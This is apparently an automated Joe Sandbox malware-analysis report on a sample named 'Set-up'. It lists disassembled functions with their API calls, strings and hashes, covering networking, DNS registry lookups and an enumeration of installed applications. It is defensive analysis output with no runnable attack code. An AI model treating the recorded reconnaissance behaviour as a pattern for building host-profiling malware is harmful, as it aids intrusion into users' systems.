WSAResetEvent.WS2_32(8508C483), ref: 00C90A1F

Strings

multi.c, xrefs: 00C907B2

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: Event$EventsSelect$EnumNetwork$MultipleResetWaitgetsockopt
String ID: multi.c
API String ID: 3264668090-214371023
Opcode ID: e7fb5f9b5d43e9eca209cf88cd093f9c6fcb681cf96e21ebcac186419c9819c8
Instruction ID: 16bf9bf82de044d7ee438dc1f5c0a3b8f0757fc1d69a09f74de5190ae5be4190
Opcode Fuzzy Hash: e7fb5f9b5d43e9eca209cf88cd093f9c6fcb681cf96e21ebcac186419c9819c8
Instruction Fuzzy Hash: 18D1E2756083019FEB10DF64C889B6B77E9FF84318F24492CF8A5C2252E774EA54DB92

Function 00C96FA0 Relevance: 13.8, APIs: 9, Instructions: 255
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?), ref: 00C97010

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 6edcee8fcd6c53ef0cdbbbd54ccdfb651c7d9b915f6ff91de47d882166efdaf3
Instruction ID: 18d698ac297509fb3dfddedfe0a01f4af46df81907ae4c2fb65525ad78db91e3
Opcode Fuzzy Hash: 6edcee8fcd6c53ef0cdbbbd54ccdfb651c7d9b915f6ff91de47d882166efdaf3
Instruction Fuzzy Hash: 4491063061A7458BDB358B69C8887BB72D9FFC4320F14872CE8A9831D4EB749E50D691

Function 00D4A8C0 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,?,00000000,00001001,?), ref: 00D4A90C

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: 040b1c47bee8159388f475a13a9cb184d3ffa98b7431ee481b86b762b32694d5
Instruction ID: e2232d190899aba5d41c7c94ca7da18a35e6186ede2496a873f8e7455a22142a
Opcode Fuzzy Hash: 040b1c47bee8159388f475a13a9cb184d3ffa98b7431ee481b86b762b32694d5
Instruction Fuzzy Hash: 6BF06D79108308AFD2209F05EC48DABBBEDEFC9754F05456DF848132118270AE10CE72

Function 00D3A440 Relevance: 90.3, APIs: 43, Strings: 8, Instructions: 1038registrystringCOMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00D3A499
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00D3A4FB
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00D3A531
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00D3AA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00D3AA4C
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00D3AA97
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00D3AAE9
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00D3AB30
RegCloseKey.KERNELBASE(?), ref: 00D3AB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00D3AB82
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 00D3ABAD
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 00D3ABF0
RegCloseKey.ADVAPI32(?), ref: 00D3AC2A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00D3AC46
RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 00D3AC71
RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 00D3ACB4
RegCloseKey.ADVAPI32(?), ref: 00D3ACEE
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00D3AD0A
RegEnumKeyExA.KERNELBASE ref: 00D3AD8D
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00D3ADB0
RegCloseKey.KERNELBASE(?), ref: 00D3ADD9
RegEnumKeyExA.KERNELBASE ref: 00D3AE08
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00D3AE2A
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00D3AE54
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,?), ref: 00D3AEA3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00D3AF18
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00D3AF2C
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00D3AF63
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00D3AFB2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00D3B027
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00D3B03B
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00D3B072
RegQueryValueExA.ADVAPI32(?,DhcpDomain,00000000,00000000,00000000,?), ref: 00D3B0C1

Strings

DhcpDomain, xrefs: 00D3B06C, 00D3B0BB
PrimaryDNSSuffix, xrefs: 00D3AC6B, 00D3ACAE
Software\Policies\Microsoft\Windows NT\DNSClient, xrefs: 00D3AB78
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 00D3AA0F
Software\Policies\Microsoft\System\DNSClient, xrefs: 00D3AC3C
Domain, xrefs: 00D3AAE3, 00D3AB2A, 00D3AF5D, 00D3AFAC
System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, xrefs: 00D3AD00
SearchList, xrefs: 00D3AA46, 00D3AA91, 00D3ABA7, 00D3ABEA, 00D3AE4E, 00D3AE9D

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: QueryValue$Open$Close$AdaptersAddressesstrncat$Enumstrlen
String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
API String ID: 1856363200-1047472027
Opcode ID: ed01038d60ebed7416c682f91a141d0eeb202821ee8c670adbbfb6b187ec406a
Instruction ID: 566b1854f8bcd86946c9918678a38e2fb4e5eca3a95ea14431c9a36504e5a8de
Opcode Fuzzy Hash: ed01038d60ebed7416c682f91a141d0eeb202821ee8c670adbbfb6b187ec406a
Instruction Fuzzy Hash: 4282A1B1604301AFE3209F29DC85B6BBBE8EF95740F184829F985D7291E771E944CB62

Function 00D49740 Relevance: 34.0, APIs: 12, Strings: 7, Instructions: 736
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(CARES_HOSTS), ref: 00D4978D
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 00D497BA
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00D497E4
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00D498A5
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000104), ref: 00D49920
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00D49946
RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00D49974
ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 00D49981
RegCloseKey.ADVAPI32(?), ref: 00D4998B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00D49992
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00D497FE

Part of subcall function 00D478A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000000,00D4E16D,?), ref: 00D478AF
Part of subcall function 00D478A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 00D478D9

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 00D49C46

Strings

#, xrefs: 00D49A3F
CARES_HOSTS, xrefs: 00D49788
DatabasePath, xrefs: 00D4996B
\hos, xrefs: 00D4999A
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 00D4993C
#, xrefs: 00D49B9D
sts, xrefs: 00D499A2

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _stricmp_time64strlen$CloseEnvironmentExpandOpenQueryStringsValue_stat64getenvmemcpymemset
String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
API String ID: 3843116398-4129964100
Opcode ID: 0f02bfc531125de77940e23981acdaa2b8964f7e0f1159c6bcd4abd465c63194
Instruction ID: 4c8e85200e27dea35d6e2fddc7edd741e4432c792ecab18b6bf0808f3a5f0ed6
Opcode Fuzzy Hash: 0f02bfc531125de77940e23981acdaa2b8964f7e0f1159c6bcd4abd465c63194
Instruction Fuzzy Hash: 4132B4B6904201ABEB11AB25EC52B1BB7A8EF54314F0C4434F94996293FB31ED15DBB3

Function 00E5E5D0 Relevance: 19.6, APIs: 13, Instructions: 107
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E5E2
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?), ref: 00E5E5FA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 00E5E637
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00DEA31E), ref: 00E5E64D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00DEA31E,00000001,?,00000008,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000), ref: 00E5E665
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E678
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E685
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E690
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00DEA31E,?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E), ref: 00E5E6A6
GetLastError.KERNEL32(?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E6B0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?), ref: 00E5E6CC
GetLastError.KERNEL32(?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E6E2
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00DEA31E,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E6FA

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_errnofopenstrlen$_wfopen
String ID:
API String ID: 2867842857-0
Opcode ID: 8a9120b0252292c3366326e8f2fe3843e69770b42fbe6765a0c729fac9f6a794
Instruction ID: bdf53d1d067f79c0e59de66420423ec6bc687692fcddd1d3d7d8d14edb0c62aa
Opcode Fuzzy Hash: 8a9120b0252292c3366326e8f2fe3843e69770b42fbe6765a0c729fac9f6a794
Instruction Fuzzy Hash: 6E312479600201BFEB346E74DC49F7B376DEB54756F148825FA02D92C0EB30EA148B61

Function 00CB8B50 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 263
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,00000001), ref: 00CB8C2F
WSAGetLastError.WS2_32 ref: 00CB8C39
SleepEx.KERNELBASE(00000000,00000000), ref: 00CB8CF3
getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00CB8D0E
WSAGetLastError.WS2_32 ref: 00CB8D18
WSASetLastError.WS2_32(00000000), ref: 00CB8E0C

Strings

not connected yet, xrefs: 00CB8BDC
cf-socket.c, xrefs: 00CB8EDF
connect to %s port %u from %s port %d failed: %s, xrefs: 00CB8E78
connected, xrefs: 00CB8DA7
local address %s port %d..., xrefs: 00CB8C7F

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ErrorLast$Sleepconnectgetsockopt
String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
API String ID: 2513251565-879669977
Opcode ID: 0bf2ad87901c114e52f0c6a17a56fd4651442bd3f766606005bab106b6aa949b
Instruction ID: 393b9fc21d82646c7583b47e4cf13e19516e6ef6719861814e07f8bda075dbde
Opcode Fuzzy Hash: 0bf2ad87901c114e52f0c6a17a56fd4651442bd3f766606005bab106b6aa949b
Instruction Fuzzy Hash: 91B1A174604346AFDB10CF34CD85BA6BBE8AF45314F04892DE869872D2DB70ED59C761

Function 00C82F17 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 144
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00C82FED
RegEnumKeyExA.KERNELBASE ref: 00C831A5

Strings

installed_apps, xrefs: 00C82F36
d, xrefs: 00C82FA0
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00C82F49, 00C82F71
SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00C82F5D

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: EnumOpen
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall$d$installed_apps
API String ID: 3231578192-797059590
Opcode ID: c5719ddf0294dd34bc33505e3603c42ce9e44cc7775b3cc1e8033a3dc09b5ed4
Instruction ID: a0693389b226d582175a6d4fce7edd328770dbe547f986d8951800096d3286e7
Opcode Fuzzy Hash: c5719ddf0294dd34bc33505e3603c42ce9e44cc7775b3cc1e8033a3dc09b5ed4
Instruction Fuzzy Hash: 3F7181B4904319DFDB54EF69C58479EBBF0BF84308F10885DE998A7201E7749A88CF92

Function 00C876A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(multi.c,?,?,?), ref: 00C876DE
send.WS2_32(multi.c,?,?,?), ref: 00C876EA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00C87721
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00C87745
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C8774D

Strings

multi.c, xrefs: 00C876DD, 00C876E9
LIMIT %s:%d %s reached memlimit, xrefs: 00C87712, 00C87731
send, xrefs: 00C8770B, 00C8772A
SEND %s:%d send(%lu) = %ld, xrefs: 00C876F8

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: send$__acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
API String ID: 3540913164-3388739168
